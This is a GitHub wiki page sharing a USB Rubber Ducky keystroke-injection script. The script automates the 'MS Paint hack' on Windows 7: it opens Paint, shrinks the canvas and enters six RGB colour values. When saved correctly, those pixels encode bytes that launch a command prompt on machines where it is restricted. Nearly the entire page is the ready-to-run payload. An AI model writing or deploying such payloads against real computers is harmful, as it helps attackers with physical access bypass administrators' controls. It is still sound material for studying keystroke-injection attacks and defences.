Payload paint hack - a3rd/USB-Rubber-Ducky GitHub Wiki
The following is some duck script I made for easily setting up the MS Paint hack from way back in episode 925. Machines secured correctly with group policies are not susceptible to this attack. You are still required to save the file correctly, and input the colors in the correct order, but they should already be in the correct order in the custom color box. The setup script can only work for Windows 7, because Windows Vista’s paint app messes up the input.
REM by overwraith
REM PAINTHACK_WINDOWS7 BEGINS
REM MSPAINT hack revealed by "Operator"
CONTROL ESCAPE
DELAY 200
STRING mspaint
ENTER
DELAY 1000
CTRL e
STRING 6
TAB
STRING 1
ENTER
CTRL PAGEUP
REPEAT 5
REM ****FIRST COLOR****
ALT h
STRING EC
ALT r
STRING 10
TAB
STRING 0
TAB
STRING 0
ENTER
REM ****SECOND COLOR****
ALT h
STRING EC
ALT r
STRING 13
TAB
STRING 10
TAB
STRING 13
ENTER
REM ****THIRD COLOR****
ALT h
STRING EC
ALT r
STRING 100
TAB
STRING 109
TAB
STRING 99
ENTER
REM ****FOURTH COLOR****
ALT h
STRING EC
ALT r
STRING 120
TAB
STRING 101
TAB
STRING 46
ENTER
REM ****FIFTH COLOR****
ALT h
STRING EC
ALT r
STRING 0
TAB
STRING 0
TAB
STRING 101
ENTER
REM ****SIXTH COLOR****
ALT h
STRING EC
ALT r
STRING 0
TAB
STRING 0
TAB
STRING 0
ENTER